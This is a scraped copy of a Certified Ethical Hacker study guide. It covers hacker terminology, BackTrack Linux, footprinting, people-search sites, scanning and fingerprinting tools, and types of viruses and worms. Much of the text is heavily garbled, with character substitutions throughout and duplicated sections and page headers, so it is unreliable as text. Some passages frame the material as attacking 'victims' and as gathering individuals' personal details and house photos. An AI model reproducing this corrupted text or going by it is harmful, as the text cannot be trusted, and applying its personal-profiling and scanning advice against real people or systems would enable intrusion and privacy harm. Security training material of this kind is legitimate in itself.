ceh course material
Post on 06-Jul-2018
236 Views
Preview:
TRANSCRIPT
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 1/67
CERTIFIED ETHICAL HACKER
Study Guide
copyright © 2016 EAPL 1
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 2/67
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 3/67
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 4/67
d"t"("!e to cr"!h) A! " re!ult+ de&elo#er! "nd u!er! were un"(le to u#lo"d or downlo"d "ny
"##lic"tion!)
DIFFERENCE BETWEEN HACKER AND CRACKER
There "re lot! o "rticle! on internet "(out the dierence (etween Hackers "nd Crackers. For m"ny
ye"r!+ medi" h"! erroneou!ly u!ed the Hacker word with " Cr"c'er) So the gener"l #u(lic now
(elie&e! h"c'er i! !omeone who (re"'! into com#uter !y!tem!+ hacking passwords+ we(!ite! "nd
mi!u!e! them) =ut thi! i! "(!olutely untrue "nd it demor"li;e! !ome o our mo!t t"lented h"c'er!)
The gre"tne!! o mi!conce#tion you c"n determine rom the "ct th"t world>! (igge!t "uthentic !ource
WIKI8EDIA h"! deined h"c'er! in " incorrect w"y) Wi'i#edi" h"! deined h"c'er! in the ollowing
w"y?
“Hacking is nathori!ed se o" co#pter and network resorces. $The ter# “Hacker%
origina&&' #eant a (er' gi"ted progra##er. In recent 'ears thogh) with easier access to
#&tip&e s'ste#s) it now has negati(e i#p&ications.*%
There i! " &ery thin line dierence (etween the h"c'er "nd cr"c'er) Li'e " coin h"! two "ce!
he"d! or t"il!+ !imil"r i! true or com#uter ex#ert!) Some u!e! their techni@ue! "nd ex#erti;e
to hel# the other! "nd !ecure the !y!tem! or networ'! "nd !ome mi!u!e! them "nd u!e th"t or
their own !eli!h re"!on!)
There "re !e&er"l tr"dition"l w"y! th"t determine! the dierence (etween the h"c'er! "ndcr"c'er!) In thi! (oo' we will #ro&ide you the!e w"y! in order o their "cce#t"nce in the
com#uter "nd IT m"r'et) Fir!t o "ll+ let me #ro&ide you the ("!ic deinition! o (oth h"c'er!
"nd cr"c'er!)
These de"initions are as "o&&ows+
Hackers+ A Hacker i! " #er!on who i! extremely intere!ted in ex#loring the thing! "nd
recondite wor'ing! o "ny com#uter !y!tem or networking !y!tem) .o!t oten+ h"c'er! "re
the ex#ert #rogr"mmer!) The!e "re "l!o c"lled Ethica& Hackers or white h"t h"c'er!) And the
techni@ue or h"c'ing they #erorm i! c"lled ethic"l h"c'ing)
Ethic"l H"c'ing .e"n! you thin' li'e H"c'er!) i)e Fir!t you H"c' the Sy!tem! "nd ind out
the loo# hole! "nd then try to correct tho!e Loo# Hole!+ The!e ty#e! o h"c'er! #rotect the
cy(erworld rom e&ery #o!!i(le thre"t "nd ixe! the uture coming !ecurity loo# hole!) The!e
#eo#le! "re "l!o c"lled "! G2R2>!B o Com#uter Security)
Crackers+ A Crackers or Black Hat hackers or cheaters or simply criminals, they are
called criminals because they are having the mind-set of causing harm to security and they
copyright © 2016 EAPL 4
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 5/67
steals very useful data and use it in wrong ways. Phishers also come in this category who
steals account info and steal your credit card nos. and money over the Net.
Below is the Diagrams which shows the basic difference between cracker or black hat hackers
and Hackers or ethical hackers or white hat hackers.
e hope this will help you to clear most of your doubts about hackers and crackers. !nd the
most important thing, until and unless an ethical hacker thinks like a cracker you can never
become an e"pert ethical hacker because to get most out of any computer system you must
understand the mind-set of crackers that what they can do and up to what level they can
damage.
Now when you will identify the vulnerabilities and loopholes, #f you fi"es them so that in
future anyone cannot breach that same vulnerability then you are Hacker or ethical hacker or
hite Hat hacker and if you utili$e that loophole of misdeeds or for fun then its cracking or
Black hat hacking. !nd black hat hackers are intelligent peoples but criminals or simply
cyber cops call them evil genius.
BE,T -ERATIN/ ,0,TE1 F-R HACKER,
.o!t o u!er! conu!ed "(out which o#er"ting !y!tem i! (e!t or h"c'er! "nd or doing
h"c'ing "cti&itie! li'e h"c'ing wirele!! networ' #"!!word!+ networ' !nier!+ re&er!e
engineering tool!+ "##lic"tion h"c'ing tool! "nd other encry#ting "nd !#ooing h"c'ing tool!)
Here we !ugge!t o#er"ting !y!tem i! ="c'tr"c' or '"li Linux)
copyright © 2016 EAPL 5
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 6/67
=ut you c"n "l!o gi&e " try to ."triux 1#er"ting Sy!tem "nd 'no##ix+ ."triux 1S i! *u!t
"we!ome (ut it>! !till under con!truction "! de!igner! "re !till wor'ing on it "nd #"tching it)
-ow let>! di!cu!! more "(out unction"lity o ="c'tr"c' o#er"ting !y!tem)
Best -perating ,'ste#+ Backtrack 2in3
="c'Tr"c' i! " Linux/("!ed #enetr"tion te!ting "r!en"l th"t "id! !ecurity #roe!!ion"l! in the
"(ility to #erorm "!!e!!ment! in " #urely n"ti&e en&ironment dedic"ted to h"c'ing)
Reg"rdle!! i you>re m"'ing ="c'Tr"c' your #rim"ry o#er"ting !y!tem+ (ooting rom " Li&e
D6D+ or u!ing your "&orite thum( dri&e+ ="c'Tr"c' h"! (een cu!tomi;ed down to e&ery
#"c'"ge+ 'ernel conigur"tion+ !cri#t "nd #"tch !olely or the #ur#o!e o the #enetr"tion te!ter)
="c'Tr"c' i! intended or "ll "udience! rom the mo!t !"&&y !ecurity #roe!!ion"l! to e"rly
newcomer! to the inorm"tion !ecurity ield) ="c'Tr"c' #romote! " @uic' "nd e"!y w"y to
ind "nd u#d"te the l"rge!t d"t"("!e o !ecurity tool collection to/d"te)
="c' Tr"c' i! @uite #o!!i(ly the mo!t com#rehen!i&e Linux di!tri(ution o !ecurity tool!)
=oth h"c'er! "nd cr"c'er! c"n "##reci"te the e"ture! o thi! di!tri(ution) For (l"c'/h"t
h"c'er!+ it #ro&ide! "n e"!y "cce!! to !otw"re th"t "cilit"te! ex#loit"tion! or !ecured
!y!tem! "nd other re&er!e engineering) For white/h"tter!+ it i! " #enetr"tion te!ter th"t ind!
hole! in " !ecurity !cheme) See+ e&ery(ody win!$
Major Features of BackTrack Linux
copyright © 2016 EAPL 6
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 7/67
Back%rack features the latest in security penetration software. %he current &inu"
kernel is patched so that special driver installation is unnecessary for attacks. 'or
e"ample, an !theros-based wireless networking adapter will no enter monitor mode
or in(ect packets without the )adi'i driver patch. ith Back%rack, you don*t need
to worry about that. #t*s (ust plug-and-play ready-to-go+ hat*s great is that this &inu" distribution comes &ive-on-D. o, no installation is
needed. However, what you e"perience Back%rack, you will reali$e that it is a must to
download this operating system and install it on your &aptop. !t the very least,
download the )are irtual !ppliance for Backtrack. )ake sure you also install
the )are %ools for &inu" as well. )any features will still work in )are mode.
• Based on/ Debian, 0buntu
• 1rigin/ wit$erland
• !rchitecture/ i234
• Desktop/ 'lu"bo", 5D6• ategory/ 'orensics, 7escue, &ive )edium
• ost/ 'ree
Hacking Tools:
Back%rack provides users with easy access to a comprehensive and large collection of
security-related tools ranging from port scanners to password crackers. upport for
&ive D and &ive 0B functionality allows users to boot Back%rack directly from
portable media without re8uiring installation, though permanent installation to hard
disk is also an option.
Back%rack includes many well known security tools including/
• )etasploit integration
• 7')1N #n(ection capable wireless drivers
• 5ismet
• Nmap
• 6ttercap
• ireshark 9formerly known as 6thereal:
• Be6' 9Browser 6"ploitation 'ramework:
! large collection of e"ploits as well as more common place software such as
browsers. Back%rack arranges tools into ;; categories/
• #nformation <athering
• Network )apping
• ulnerability #dentification
• eb !pplication !nalysis
• 7adio Network !nalysis 93=>.;;, Bluetooth, 7fid:
• Penetration 96"ploit ? ocial 6ngineering %oolkit:
• Privilege 6scalation
• )aintaining !ccess
copyright © 2016 EAPL 7
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 8/67
• Digital 'orensics
• 7everse 6ngineering
• oice 1ver #P
CHATER 4 5 F--T RINTIN/
Foot#rinting "nd How It c"n (e Hel#Ful to H"c' !y!tem!
copyright © 2016 EAPL 8
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 9/67
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 10/67
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 11/67
4) -ow you c"n u!e thi! inorm"tion to !e"rch more "(out 8er!on u!ing Sim#ly google "!
!hown in next !n"#!hot))
copyright © 2016 EAPL 11
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 12/67
-ow It! on you need How much ino u w"nt to ex#lore "(out the #er!on "nd we(!ite which u
w"nt to h"c'?
copyright © 2016 EAPL 12
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 13/67
I thin' you "ll Will Li'e Thi!!!?) WE will continue 1ur Di!cu!!ion on F11T8RI-TI-G
tomorrow "l!o? A! It i! the .o!t Im#ort"nt 8h"!e?))
We will Ex#lore .ore Inorm"tion in the -ext cl"!!?) I will ex#l"in Few .ore intere!ting
"ct! "nd inorm"tion ex#loring thing! !o re"d on?
7NEARTHIN/ BA,IC INF-R1ATI-N
Fir!t o "ll We will ocu! on 2ne"rthing the ="!ic Inorm"tion "(out the !ite? i)e the I8 "nd
!er&er inorm"tion!))
I will Show you with the hel# on !n"#!hot! ,
Fir!t go to START R2- Mty#e cmdMthen ty#e tr"cert www)we(!iten"me)com
Here we will u!e two ("!ic comm"nd! in comm"nd 8rom#tcmd, tr"cert
www)we(i!teto(e"nly!ed)com
"nd #ing www)we(!iten"me)com
It will loo' !omething li'e thi!,
We tr"ce routed www)"muli&e)com
3) Show! 1ur G"tew"y o connecti&ity)4) Show! our 1utgoing Foot#rint I#i)e the our I8 th"t i! (eing "n"ly;ed (y we(!ite
5) Show! Connecti&ity #"!!e! through which !er&ice 8ro&ider) I u!e! =S-L (ut it! !howing
"irtel (ec"u!e I #reer D-S o Airtel or !uring Nuic')
-ext !te#! !howing the I#>! o We(!er&er! through which "muli&e i! (eing m"int"ined)
Ater Thi! We will c"me to now the I8 o the We(!ite "nd I# o it; we( !er&er! which "re
(eing u!ed urther)
we(!ite I# c"n (e u!ed to g"ther more inorm"tion "(out the we(!ite))
copyright © 2016 EAPL 13
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 14/67
How to Find The ersona& In"or#ation A6ot the Indi(ida& -(er Net 88
It! one o the .o!t im#ort"nt t"!') It! "l!o hel#ul in inding the "'e #roile!? =ut
unortu"ntely thi! i! limited =ut we c"n u!e it to the .o!t? There "re two we(!ite which
will hel# u!?
3) htt#,#eo#le)y"hoo)com (e!t Site To tr"ce 8eo#le or their 8er!on"l Inorm"tion "nd "l!ore&er!e 8hone or mo(ile num(er Loo' u#
4) htt#,www)intelliu!)com =ut thi! !ite i! limited to 2S only
S"m#le Re#ort rom Intelliu! ,
copyright © 2016 EAPL 14
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 15/67
S"tellite 8icture o Ooe>! Hou!e rom Intelliu!,
-ow 2!ing the!e Site! you will (e "(le to collect the #er!on"l inorm"tion o the indi&idu"l!
"nd "l!o (eing "(le to identiy the "'e #roile!))
T--2, NEEDED F-R F--TRINTIN/ +
%ou c"n "&oid "(o&e hectic wor' (y u!ing thi! tool , S#iderFoot
Downlo"d lin', htt#,www)(in"ry#ool)com!#ideroot
Inorm"tion "(out S#iderFoot,
S#iderFoot i! " ree+ o#en/!ource+ dom"in oot#rinting tool) Gi&en one or multi#le dom"in
n"me! "nd when I !"y dom"in!+ I>m reerring to the D-S 'ind+ not Window! dom"in!+ it
will !cr"#e the we(!ite! on th"t dom"in+ "! well "! !e"rch Google+ -etcr"t+ Whoi! "nd D-S
to (uild u# inorm"tion li'e,
• Su(dom"in!
• Aili"te!
• We( !er&er &er!ion!
• 2!er! i)e) Pu!er
• Simil"r dom"in!
copyright © 2016 EAPL 15
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 16/67
• Em"il "ddre!!e!
• -et(loc'!
ADDITI-NA2 F--TRINTIN/ T--2, +
-ote "ll the!e tool! "re reew"re! )) 2 c"n e"!ily google then "nd downlo"d the!e))
• Whoi!• -!loo'u#
• ARI-
• -eo Tr"ce
• 6i!u"lRoute Tr"ce
• Sm"rtWhoi!
• e."ilTr"c'er8ro
• We(!ite w"tcher
• Google E"rth
• GE1 S#ider • HTTr"c' We( Co#ier
• E/m"il S#ider
Thi! i! "ll "(out Foot#rinting ) -ow 2!e the G"thered inorm"tion to m"'e ("!ic
Det"iled Inorm"tion "(out the We(!ite#er!on?
copyright © 2016 EAPL 16
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 17/67
CHATER 4 9 ,CANNIN/ NETW-RK,
Sc"nning "nd Att"c'ing 1#en 8ort!
In Sc"nning 8"rt We Will Co&er the Following To#ic! in det"il! ,
P Deinition o !c"nning
P Ty#e! "nd o(*ecti&e! o Sc"nning
P 2nder!t"nding Sc"nning methodology
P Chec'ing li&e !y!tem! "nd o#en #ort!
P 2nder!t"nding !c"nning techni@ue!
P Dierent tool! #re!ent to #erorm Sc"nning
P 2nder!t"nding ("nner gr"((ing "nd 1S inger#rinting
P Dr"wing networ' di"gr"m! o &ulner"(le ho!t!
P 8re#"ring #roxie!
P 2nder!t"nding "nonymi;er!
P Sc"nning counterme"!ure!
What Is ,canning 88 And Wh' We Focs -n that 8
Sc"nning "! rom the n"me me"n! th"t we will !c"n !omething to ind !ome det"il! etc etc?
Sc"nning ("!ic"lly reer! to the g"thering o ollowing our inorm"tion!?
We Sc"n !y!tem! or our ("!ic #ur#o!e! ,/
copyright © 2016 EAPL 17
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 18/67
• To ind !#eciic I8 "ddre!!
• 1#er"ting !y!tem
• Sy!tem Architecture
• Ser&ice! Running on !y!tem
The &"riou! ty#e! o !c"nning "re "! ollow!,
P8ort Sc"nning
P-etwor' Sc"nning
P6ulner"(ility Sc"nning
I w"nt to Deine The!e Term! here 1nly "! they "re o gre"t u!e in urther tutori"l?
-RT ,CANNIN/ , There "re :7' #ort! in " com#uter out o which 3' "re ixed or !y!temor 1S !er&ice!) In 8ort !c"nning we !c"n or the o#en 8ort! which c"n (e u!ed to "tt"c' the
&ictim com#uter)
In 8ort !c"nning " !erie! o me!!"ge! !ent to (re"' into " com#uter to le"rn "(out the
com#uter>! networ' !er&ice!) Through thi! we will 'now th"t which #ort we will u!e to "tt"c'
the &ictim))
Network ,canning , -etwor' !c"nning i! ("!ic"lly " #rocedure o inding the "cti&e ho!t! on
the -etwor')
i)e We trie! to ind th"t !y!tem i! !t"nd"lone or multiu!er?
Thi! i! done either or the #ur#o!e o "tt"c'ing them or or networ' !ecurity "!!e!!ment i)e
how !ecured the networ' I!
:&nera6i&it' ,canning , A! rom the n"me + In thi! ty#e o !c"nning We !c"n the !y!tem!
or inding the &ulner"(ility i)e the we"'ne!! in 1Sd"t"("!e ? 1nce we ind the
&ulner"(ility or loo# hole we c"n utili;e it to =e!t))"nd "tt"c' the &ictim through th"t ?
-B;ECTI:E, -F ,CANNIN/
The!e "re 8rim"ry o(*ecti&e! o !c"nning i)e why do we do !c"nning ,
P To detect the li&e !y!tem! running on the networ')
P To di!co&er which #ort! "re "cti&erunning)
P To di!co&er the o#er"ting !y!tem running on the t"rget !y!tem inger#rinting)
P To di!co&er the !er&ice! running on the t"rget !y!tem)
P To di!co&er the I8 "ddre!! o the t"rget !y!tem)
We will #reer T11LS or thi! (ec"u!e they will reduce our Hectic Wor'? The ir!t Tool
th"t we 2!e i! the N1A +
D1W-L1AD ,htt#,nm"#)orgdi!tnm"#/9)/!etu#)exe
copyright © 2016 EAPL 18
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 19/67
Featres o" N1A +
P -m"# i! u!ed to c"rry out #ort !c"nning+ 1S detection+ &er!ion detection+ #ing !wee#+ "nd
m"ny other techni@ue!)
P It !c"n! " l"rge num(er o m"chine! "t one time)
P It i! !u##orted (y m"ny o#er"ting !y!tem!)
P It c"n c"rry out "ll ty#e! o #ort !c"nning techni@ue!)
,EC-ND T--2 I, NET T--2, <.=.>= +
It; i! " collection o &"riou! -etwor'ing Tool! ? mu!t or (eginner!?
D1W-L1AD, htt#,www)!ot#edi")com#rogDownlo"d-et/Tool!/Downlo"d/4435)html
P -et Tool! Suite 8"c' i! " collection o !c"nning tool!)
P Thi! tool!et cont"in! ton! o #ort !c"nner!+ looder!+ we( ri##er!+ "nd m"!! e/m"iler!) -ote, Some o the!e tool! m"y not Wor' (ut !ome "re too good)
copyright © 2016 EAPL 19
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 20/67
copyright © 2016 EAPL 20
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 21/67
Fir!t o Which i! 1S Finger#rinting?
What is -, Fingerprinting 88
1S inger#rinting i! the method to determine the o#er"ting !y!tem th"t i! running on the
t"rget !y!tem)
The two dierent ty#e! o inger#rinting "re,
Q Acti&e !t"c' inger#rinting
Q 8"!!i&e inger#rinting
Acti(e ,tack Fingerrinting+
="!ed on the "ct th"t 1S &endor! im#lement the TC8 !t"c' dierently)S#eci"lly cr"ted
#"c'et! "re !ent to remote 1S! "nd re!#on!e i! noted) The re!#on!e! "re then com#"red with
" d"t"("!e to determine the 1S)
assi(e Fingerrinting+
8"!!i&e ("nner gr"((ing reer! to indirectly !c"nning " !y!tem to re&e"l it! !er&er>! o#er"ting
!y!tem)
It i! "l!o ("!ed on the dierenti"l im#l"nt"tion o the !t"c' "nd the &"riou! w"y! "n 1S
re!#ond! to it)
It u!e! !niing techni@ue! in!te"d o the !c"nning techni@ue!) It i! le!! "ccur"te th"n "cti&e
inger#rinting)
T--2 7,ED F-R -, FIN/ERRINTIN/ +p=" -s Fingerprinting Too&
D-WN2-AD+
htt#,lc"mtu)coredum#)cx#/win54);i#
8 &4 i! " &er!"tile #"!!i&e 1S inger#rinting tool) 8 c"n identiy the o#er"ting !y!tem on,
• m"chine! th"t connect to your (ox S%- mode+
• m"chine! you connect to S%-ACK mode+
• m"chine you c"nnot connect to RST mode+
• m"chine! who!e communic"tion! you c"n o(!er&e)
8 c"n "l!o do m"ny other tric'!+ "nd c"n detect or me"!ure the ollowing,
• irew"ll #re!ence+ -AT u!e u!eul or #olicy enorcement+
• exi!tence o " lo"d ("l"ncer !etu#+
• the di!t"nce to the remote !y!tem "nd it! u#time+
• other guy>! networ' hoo'u# DSL+ 1C5+ "&i"n c"rrier! "nd hi! IS8)
copyright © 2016 EAPL 21
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 22/67
What is :&nera6i&it'888
A! I h"&e Told in Fir!t cl"!! th"t 6ulner"(ility i! we"'ne!! in the networ'+!y!tem+d"t"("!e
etc? We c"n c"ll &ulner"(ility "! the Loo#hole i)e through which &ictim c"n (e "tt"c'ed)) We
ir!t "n"ly;e the loo#hole "nd then try to u!e it to (e!t to H"c' the Sy!tem o &ictim or
or"g"ni!"tion or we(!ite?
T--2 THAT WE 7,E F-R :72NERABI2IT0 ,CANNIN/ ARE +
3) -e!!u!
4) Retin"
NE,,7,
The Nesss &ulner"(ility !c"nner+ i! the world/le"der in "cti&e !c"nner!+ e"turing high
!#eed di!co&ery+ conigur"tion "uditing+ "!!et #roiling+ !en!iti&e d"t" di!co&ery "nd
&ulner"(ility "n"ly!i! o your !ecurity #o!ture) -e!!u! !c"nner! c"n (e di!tri(uted throughout
"n entire enter#ri!e+ in!ide D.!+ "nd "cro!! #hy!ic"lly !e#"r"te networ'!)
copyright © 2016 EAPL 22
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 23/67
Fe"ture!,
P 8lug/in/"rchitecture
P -ASL -e!!u! Att"c' Scri#ting L"ngu"ge
P C"n te!t unlimited num(er o ho!t! !imult"neou!ly
P Sm"rt !er&ice recognition
P Client/!er&er "rchitecture
P Sm"rt #lug/in!
P 2#/to/d"te !ecurity &ulner"(ility d"t"("!e
,A12E ,NA,H-T+
copyright © 2016 EAPL 23
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 24/67
D-W
N2-AD NE,,7, +
htt#,www)ne!!u!)orgdownlo"d
RETINA
Retin" -etwor' Security Sc"nner+ the indu!try "nd go&ernment !t"nd"rd or multi/#l"torm
&ulner"(ility m"n"gement+ identiie! 'nown "nd ;ero d"y &ulner"(ilitie! #lu! #ro&ide!
!ecurity ri!' "!!e!!ment+ en"(ling !ecurity (e!t #r"ctice!+ #olicy enorcement+ "nd regul"tory
"udit!)
copyright © 2016 EAPL 24
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 25/67
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 26/67
D-WN2-AD RETINA+
htt#,www)eeye)comhtml#roduct!retin"downlo"dindex)html
-ow Ater Sc"nning the Sy!tem! or 6ulner"(ilite! )) We will -ow Going to "tt"c' the
Sy!tem! (ut (eore thi! we !hould 'now the Ri!' ) Thi! ri!' c"n (e reduced to gre"t extent (yu!ing 8roxie!)) In -ext Cl"!! We will Di!cu!! wh"t "re 8roxie! "nd How they wor' "nd how
they "re going to Hel# u! "nd !ome undetect"(le "nd untr"ce"(le 8roxy !er&er!?
SCANNING AND ATTACKING OPEN PORTS
In my Previous class I have explained about footprinting i.e getting the IP of the
Person/website/organisation whom you want to attack and extracting the personal
Information.. You all were thinking that what was the use of that .. In this class you will
came to know why we have undergo footprinting and analysis part…
In Scanning Part e ill !over the "ollowing #opics in details $
% &efinition of scanning
% #ypes and ob'ectives of Scanning
% (nderstanding Scanning methodology
% !hecking live systems and open ports
% (nderstanding scanning techni)ues
% &ifferent tools present to perform Scanning
% (nderstanding banner grabbing and *S fingerprinting
% &rawing network diagrams of vulnerable hosts% Preparing proxies
copyright © 2016 EAPL 26
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 27/67
% (nderstanding anonymi+ers
% Scanning countermeasures
What Is Scanning ?? And WhyWe Focus On that ?
Scanning as from the name means that we will scan something to find some details etc
etc… Scanning basically refers to the gathering of following four informations…
e Scan systems for four basic purposes $,
• #o find specific IP address
• *perating system
• System -rchitecture
• Services unning on system
#he various types of scanning are as follows$
%Port Scanning
%etwork Scanning
%0ulnerability Scanning
copyright © 2016 EAPL 27
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 28/67
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 29/67
% It can carry out all types of port scanning techni)ues.
S$CON( TOO) IS N$T TOO)S*+,+-, &
It+ is a collection of various etworking #ools … must for beginners…
&*:*-&$ http$//www.softpedia.com/prog&ownload/et,#ools,&ownload,>>3?@.html
% et #ools Suite Pack is a collection of scanning tools.
% #his toolset contains tons of port scanners6 flooders6 web rippers6 and mass e,mailers.
ote$ Some of these tools may not ork but some are too good.
copyright © 2016 EAPL 29
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 30/67
I thisnk that4s Anough for #oday .e will discuss more on scanning tomorrow (ntil You
try these tools..
If you have any problem in (sing these tools then you can ask me ..I will help you use
these tools…
copyright © 2016 EAPL 30
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 31/67
INTR-D7CTI-N T- TR-;AN,) :IR7,E, AND BACKD--R,
Welcome ="c' Guy!+ Ater " he"&y =u!y Schedule I come with the -ext H"c'ing Tutori"l) Ithin' e&ery(ody who i! u!ing com#uter h"! "ced the #ro(lem o &iru!e! "t le"!t once in lie)
In tod"y>! Cl"!! I will going to Introduce Wh"t "re Tro*"n!+ 6iru!e!+ ="c'door!+ worm! etc)
And How they wor' to inect the !y!tem) In l"ter cl"!!e! we will di!cu!! more "(out them
Li'e How to Get rid o 6iru!e!+ Tro*"n! etc) How to remo&e them "nd the .o!t Im#ort"nt
How to 2!e them or H"c'ing 6ictim! !y!tem! etc)) So Guy! Kee# Re"ding))
Let! St"rt With 6iru!e!? Wh"t "re The!e "nd How they Wor'))
:IR7,E,+
6iru! i! " !el/re#lic"ting #rogr"m th"t #roduce! it! own code (y "tt"ching co#ie! o it!el
into other execut"(le code! li'e executi&e ile!)exe +Dyn"mic lin' Li(r"ry>!)dll! etc))
6iru! Gener"lly o#er"te! in the ("c'ground "nd ocour!e without the De!ire o the 2!er "!
-oone w"nt th"t &iru! to h"rm their com#uter))R1FL ,8
,o#e We&&?known Characteristics o" :irses+
• Re!ide! in the memory "nd re#lic"te! it!el while the #rogr"m where it "tt"ched i!
running
• Doe! not re!ide in the memory "ter the execution o #rogr"m
• C"n tr"n!orm them!el&e! (y ch"nging code! to "##e"r dierent
copyright © 2016 EAPL 31
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 32/67
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 33/67
Fig, Inection 8h"!e th"t how ile i! "tt"ched to )exe ile! to inect 8rogr"m!)
Fig, Att"c' 8h"!e th"t how the File! "re got Fr"gmented "nd !y!tem !#eed Slow! Down
copyright © 2016 EAPL 33
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 34/67
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 35/67
DIFFERENCE BETWEEN W-R1, AND :IR7,E,
.o!t o u! thin'! th"t worm! "re &iru!e! "nd their wor'ing i! !imil"r to &iru!e! (ut thi! not
the re"l !cen"rio) There i! " =ig dierence (etween the gener"l &iru!e! "nd Worm!)
A worm i! " !#eci"l ty#e o &iru! th"t c"n re#lic"te it!el "nd u!e memory+ 6t cannot
attach itse&" to other progra#s) A worm !#re"d! through the inected networ'
"utom"tic"lly (ut " &iru! doe! not)
How To Detect 0or ,'ste# is In"ected 6' :irs88
Thi! i! one o the m"*or @ue!tion to "n!wer "nd the !im#le!t "n!wer to it i! th"t there "re
!ome Gener"l Indic"tion! th"t Indic"te! th"t Sy!tem i! inected or -ot)
Gener"l Indic"tion! "re !t"ted =elow,
• 8rogr"m! t"'e longer to lo"d th"n norm"l (ec"u!e &iru! h"lt! the norm"l wor'ing o
#rogr"m! "! it "tt"che! it!el to it+ !o the execution time incre"!e! )
• Com#uter>! h"rd dri&e con!t"ntly run! out o ree !#"ce)
• File! h"&e !tr"nge n"me! which "re not recogni;"(le)
• 8rogr"m! "ct err"tic"lly 8rogr"m! Gi&e! error! on u!e
Re!ource! "re u!ed u# e"!ily c"n (e E"!ily &iewed u!ing t"!' m"n"ger)
H-W THE :IR7, D-E, INFECT, THE ,0,TE188
6iru!e! inect the !y!tem in the ollowing w"y!,
3) Lo"d! it!el into memory "nd chec'! or execut"(le on the di!')
4) A##end! the m"liciou! code to " legitim"te #rogr"m which i! Im#ort"nt to the u!er)
5) Since the u!er i! un"w"re o the re#l"cement+ he!he l"unche! the inected #rogr"m)
7) A! " re!ult o the inected #rogr"m (eing execute!+ other #rogr"m! get inected "!
well)9) The "(o&e cycle continue! until the u!er re"li;e! the "nom"ly within the !y!tem)
copyright © 2016 EAPL 35
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 36/67
,TA/E, -F :IR7, 2IFE C0C2E FR-1 DE,I/N T- E2I1INATI-N
The lie cycle indic"ted "(o&e i! " gener"l lie cycle o the 6iru! rom de!ign 8h"!e to
Elimin"tion #h"!e?
:IR7, C2A,,IFICATI-N 4 T0E, -F :IR7,E,
6iru!e! "re cl"!!iied on the ("!i! o two ("!ic Thing!,
3) Wh"t they Inect
4) How they inect
Ex"m#le!,
,'ste# ,ector or Boot :irs+
? Inect! di!' (oot !ector! "nd record!)
Fi&e :irs+
? Inect! execut"(le in 1S ile !y!tem)
1acro :irs+
? Inect! document!+ !#re"d!heet! "nd d"t"("!e! !uch "! word+ excel "nd
"cce!!) ,orce Code
copyright © 2016 EAPL 36
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 37/67
:irs+
? 1&erwrite! or "##end! ho!t code (y "dding Tro*"n code in it)
Network :irs+
QS#re"d! it!el &i" em"il (y u!ing comm"nd "nd #rotocol! o com#uter
networ')
Different Types of Virus and Worms Explained
System Sector Virusesystem sectors are special areas on your disk containing programs that are e"ecuted when you boot
9start: your P. ystem sectors 9)aster Boot 7ecord and D1 Boot 7ecord: are often targets
for viruses. %hese boot viruses use all of the common viral techni8ues to infect and
hide themselves. %hey rely on infected floppy disk left in the drive when the computer starts, they can
also be @droppedA by some file infectors or %ro(ans.
Stealth Virus
%hese viruses evade anti-virus software by intercepting its re8uests to the operating system.
! virus can hide itself by intercepting the anti-virus software*s re8uest to read the file and passing there8uest to the virus, instead of the 1. %he virus can then return an uninfected version of the file to
the anti-virus software, so that it appears as if the file is @cleanA.
Bootable CD-ROM VirusThese are a new type of virus that destroys the hard disk data content when booted with the infected
CD-R!"
Example# $omeone mi%ht %ive you a &'()* +T,+&E CD-R!"
When you boot the computer usin% the CD-R! all your data is %one" (o ,nti-virus can stop this
because ,V software or the $ is not even loaded when you boot from a CD-R!"
Self-Modificatio Virus!ost modern antivirus pro%rams try to find virus-patterns inside ordinary pro%rams by scannin% them
for virus si%natures"
, si%nature is a characteristic byte-pattern that is part of a certain virus or family of viruses"
$elf-modification viruses employ techni.ues that make detection by means of si%natures difficult or
impossible" These viruses modify their code on each infection" /each infected file
contains a different variant of the virus0
Pol!"or#$ic Code Viruscopyright © 2016 EAPL 37
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 38/67
, well-written polymorphic virus therefore has no parts that stay the same on each infection"To enable
